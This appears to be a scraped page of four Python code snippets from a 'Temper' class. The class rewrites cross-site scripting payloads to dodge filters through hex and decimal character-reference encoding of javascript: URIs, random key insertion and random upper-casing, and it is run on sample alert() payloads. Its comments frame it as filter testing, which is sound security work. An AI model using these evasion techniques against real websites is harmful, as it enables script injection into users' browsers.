Beispiel #1
            payloads.add(self.keyword_sixteenhex(payload, ))
        return payloads

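    def keyword_sixteenhex(self, str):
        """
        Rewrite the first double-quoted ``src``/``href`` value as hex
        character references.

        Only the first ``src="..."`` or ``href="..."`` match is considered,
        and only when the quoted value contains the text ``javascript``.
        Each character of the value is emitted as ``&#x<hex>`` (for example
        ``j`` becomes ``&#x6a``): lowercase hex digits, no terminating
        semicolon. The surrounding double quotes are dropped from the result.

        NOTE(review): the output contains no literal ``javascript`` text, so
        a filter under test has to decode character references before
        matching in order to recognise it.

        :param str: markup to rewrite (the name shadows the builtin and is
            kept for caller compatibility)
        :return: the rewritten markup, or ``""`` when no attribute was found
            or its value does not contain ``javascript``
        """
        encode_str = ""
        result_str = ""
        try:
            # The capture group includes the quotes; [0] raises IndexError
            # when the markup has no double-quoted src/href attribute.
            link_content = re.findall('(?:src|href)=(".*?")', str, re.S)[0]
            if "javascript" in link_content:
                for char in link_content.replace("\"", ""):
                    encode_str += "&#{}".format(
                        hex(ord(char)).replace("0x", "x"))
                result_str = str.replace(link_content, encode_str)
        except IndexError:
            # Close the log file deterministically instead of leaking the
            # handle that an inline open() would leave behind.
            with open(EXCEPTION_LOG_PATH, 'a') as log_file:
                traceback.print_exc(file=log_file)
        return result_str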


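if __name__ == "__main__":
    # Manual smoke run: pass one sample string through Temper.temper() and
    # print whatever it returns. The parenthesised print behaves the same
    # on Python 2 and Python 3 for a single argument. The set that was
    # built here before was never read, so it is gone.
    payload = '<img src="javascript:alert(65534);">'
    print(Temper().temper(payload, ))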
Beispiel #2
                    payloads.add(payload)

        if model == LIGHT_MODEL:
            return payloads.pop()

        return payloads

    def add_rand_key(self, str, key):
        """
        Insert ``key`` at a random position inside ``str`` and return the
        joined result.

        The position is drawn from ``random.random()`` scaled by the input
        length; a draw of 0 is moved to 1, so ``key`` is never placed in
        front of the first character. For an empty input the result is just
        ``key``.
        """
        chars = list(str)
        # ``or 1`` maps a draw of 0 to position 1.
        position = int(random.random() * len(chars)) or 1
        chars.insert(position, key)
        return "".join(chars)

    def get_keyword_count(self):
        """
        Return how many entries of ``self.keywords`` occur in ``self.payload``.

        Each entry is tested once with ``in``; how often it appears inside
        the payload does not change the count.
        """
        return sum(1 for candidate in self.keywords if candidate in self.payload)


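if __name__ == "__main__":
    # Manual smoke run: pass one sample string through Temper.temper() with
    # number=5 and print the return value. The parenthesised print behaves
    # the same on Python 2 and Python 3 for a single argument; the set that
    # was never read has been dropped.
    payload = '<script>alert(65534);</script>'
    print(Temper().temper(payload, number=5, ))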
Beispiel #3
            temp_payload = payload
            payloads.add(payload)
            for keyword in self.keywords:
                if keyword in payload:
                    payloads.add(
                        temp_payload.replace(keyword,
                                             self.rand_upper(keyword, number)))
                    payload = payload.replace(keyword,
                                              self.rand_upper(keyword, number))
                    payloads.add(payload)
        if model == LIGHT_MODEL:
            return payloads.pop()
        return payloads

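    def rand_upper(self, str, number):
        """
        Upper-case up to ``number`` randomly chosen lowercase characters.

        Positions are drawn only from characters that are currently
        lowercase, so the loop ends once ``number`` characters have been
        converted or no lowercase character is left. Drawing from the whole
        string and retrying on a miss would never end when the input holds
        fewer lowercase characters than requested (for example ``"a1"``
        with ``number=2``).

        :param str: text to modify (the name shadows the builtin and is kept
            for caller compatibility)
        :param number: maximum number of characters to upper-case
        :return: the modified text
        """
        chars = list(str)
        # Candidate positions: every character that is lowercase right now.
        lower_positions = [pos for pos, ch in enumerate(chars) if ch.islower()]
        converted = 0
        while converted < number and lower_positions:
            # Remove the chosen position so it cannot be drawn a second time.
            pick = lower_positions.pop(random.randrange(len(lower_positions)))
            chars[pick] = chars[pick].upper()
            converted += 1
        return "".join(chars)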


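if __name__ == "__main__":
    # Manual smoke run: print each value Temper.temper() returns for one
    # sample string in HEAVY_MODEL. The parenthesised print behaves the same
    # on Python 2 and Python 3 for a single argument. The unused set and the
    # commented-out add() call have been removed.
    payload = '<script>alert(65534);</script>'
    for variant in Temper().temper(payload, HEAVY_MODEL):
        print(variant)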
Beispiel #4
    def keyword_tenhex(self, str, model=1):
        """
        Rewrite the first double-quoted ``src``/``href`` value as decimal
        character references.

        Only the first ``src="..."`` or ``href="..."`` match is considered,
        and only when the quoted value contains the text ``javascript``.
        Two output forms exist:

        * ``model == 1``: ``&#106;`` (terminated with a semicolon)
        * ``model == 2``: ``&#0106`` (one leading zero, no semicolon)

        Any other ``model`` produces no replacement text, so the quoted
        value is simply removed. The surrounding double quotes are dropped
        in every case.

        :param str: markup to rewrite
        :param model: output form selector, 1 or 2
        :return: the rewritten markup, or ``""`` when no attribute was found
            or its value does not contain ``javascript``
        """
        matches = re.findall('(?:src|href)=(".*?")', str, re.S)
        if not matches:
            # No double-quoted src/href attribute in the input.
            return ""

        # The capture group keeps the quotes around the value.
        quoted_value = matches[0]
        if "javascript" not in quoted_value:
            return ""

        if model == 1:
            template = "&#{};"
        elif model == 2:
            template = "&#0{}"
        else:
            template = None

        if template is None:
            encoded = ""
        else:
            encoded = "".join(
                template.format(ord(ch)) for ch in quoted_value.replace("\"", ""))
        return str.replace(quoted_value, encoded)


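if __name__ == "__main__":
    # Manual smoke run: pass one sample string through Temper.temper() and
    # print the return value. The set that was built here before was never
    # read, so it has been dropped.
    payload = '<img src="javascript:alert(65534);">'
    print(Temper().temper(payload, ))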